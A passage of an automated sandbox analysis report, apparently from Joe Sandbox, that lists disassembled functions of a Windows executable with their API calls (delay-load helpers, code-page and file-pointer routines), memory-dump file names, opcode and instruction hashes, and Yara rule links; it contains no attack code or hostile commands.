                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ebbc6974238ae7cfe81edabedb848a7cb7551fe1493122d8e9ff692024a50d41
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ebbc6974238ae7cfe81edabedb848a7cb7551fe1493122d8e9ff692024a50d41
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 5764c8f217d37d71d1139ef77890276abfd18a992d9be3cfa3b191cecdbc4d2c
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 5764c8f217d37d71d1139ef77890276abfd18a992d9be3cfa3b191cecdbc4d2c
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ecb7a9a150c1725d175fb14d1ee9e0185a1bed980b12a88f27e8393a1a041077
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ecb7a9a150c1725d175fb14d1ee9e0185a1bed980b12a88f27e8393a1a041077
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 630ebac7f38c64780a3557ac9abfb0231d8f2c1627eba8568fd00f91c8cdbb50
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 630ebac7f38c64780a3557ac9abfb0231d8f2c1627eba8568fd00f91c8cdbb50
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 4a8e975e035aa068147a072f232ae7fc0c1dc32087209dbe047502ff7f06e684
                                                                                                                    • Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
                                                                                                                    • Opcode Fuzzy Hash: 4a8e975e035aa068147a072f232ae7fc0c1dc32087209dbe047502ff7f06e684
                                                                                                                    • Instruction Fuzzy Hash: 16A011C22AA202BC300822A0BC02C3B020CE0C8FA0330BA2EF802A0280A88008000830
                                                                                                                    Function 00E4E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 19d6840d4b565304f1fd2ecff208bda8f2c3b99a3be4dd25a48a3d5aa7618525
                                                                                                                    • Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
                                                                                                                    • Opcode Fuzzy Hash: 19d6840d4b565304f1fd2ecff208bda8f2c3b99a3be4dd25a48a3d5aa7618525
                                                                                                                    • Instruction Fuzzy Hash: 16A011C22AA202BC300822A0BC02C3B020CE0C8FA0330BA2EF802A0280A88008000830
                                                                                                                    Function 00E4E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 0037d3d37956e866f12223bc5353e05c24415bfbbf703093fda51e268dd9ee94
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 0037d3d37956e866f12223bc5353e05c24415bfbbf703093fda51e268dd9ee94
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    Function 00E4E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 7f848bac0bc78d71a322a75edecdb82158cb67384a5ce75f207da3003326bfe0
                                                                                                                    • Instruction ID: 3d71f87da777d9ac4ec5f4807d8ee7b3fc5989b21e4767974c4b9907bdc198e7
                                                                                                                    • Opcode Fuzzy Hash: 7f848bac0bc78d71a322a75edecdb82158cb67384a5ce75f207da3003326bfe0
                                                                                                                    • Instruction Fuzzy Hash: D0A011C22EA2003C300822A0BC02C3B020CE0C0F22330B22EF802B0280A88008000830
                                                                                                                    Function 00E4E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 6c979f0609804421d01eb7c5bd610e5b91d3c00f968219a43aed5486babfa521
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 6c979f0609804421d01eb7c5bd610e5b91d3c00f968219a43aed5486babfa521
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    Function 00E4E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 27893e3a252febd8352329a32ea42e30c72bb22dbcb742bf3eff3a29b16537d2
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 27893e3a252febd8352329a32ea42e30c72bb22dbcb742bf3eff3a29b16537d2
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    Function 00E4E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 48fbb3d1ec9b50fda1a0270060bc828bbf923059179fbfce979b9aef5aafbdee
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 48fbb3d1ec9b50fda1a0270060bc828bbf923059179fbfce979b9aef5aafbdee
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    Function 00E5BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E5BA44,?), ref: 00E5B7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E5BA89,?,00000000), ref: 00E5BC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00E5BA89,?,?,?,00E5BA89,?,00000000), ref: 00E5BC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 767472a3ca6e4aca48421ea5febd5230199238c6429c4478dcc21645d56252a0
                                                                                                                    • Instruction ID: f2b2336cc556d75158d46ce165899f43a2bd1288f555e2fc0d55d1d33cf4b4ec
                                                                                                                    • Opcode Fuzzy Hash: 767472a3ca6e4aca48421ea5febd5230199238c6429c4478dcc21645d56252a0
                                                                                                                    • Instruction Fuzzy Hash: 915146709002459EDB248F75C8816BBFBF4EF41305F18686ED896BB251D735994DCB90
                                                                                                                    Function 00E39A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E39A50,?,?,00000000,?,?,00E38CBC,?), ref: 00E39BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00E38411,-00009570,00000000,000007F3), ref: 00E39BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: 5e0cffb0b70e23411a75b043c208942eebd4e930de094998a03c0e1dfac302c6
                                                                                                                    • Instruction ID: be7405311f9067cded8ece811f7ce424b7b7d3ca650a40c0dcd39ee4e3261ac6
                                                                                                                    • Opcode Fuzzy Hash: 5e0cffb0b70e23411a75b043c208942eebd4e930de094998a03c0e1dfac302c6
                                                                                                                    • Instruction Fuzzy Hash: 2F419D316043418FDB24DF25E5884AAFFE5FFD4324F159A2DE881A3262D7F0AD48CA59
                                                                                                                    Function 00E31E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E31E55
                                                                                                                      • Part of subcall function 00E33BBA: __EH_prolog.LIBCMT ref: 00E33BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00E31EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: 5f1ac655e5c1888ac9eaf448aa30f01ac33fca869dc55f597100c466d75a48c8
                                                                                                                    • Instruction ID: a5f163281c63f7782e837e3058d1c201c9d61051c4bc411aee1ff016b7ef4b3a
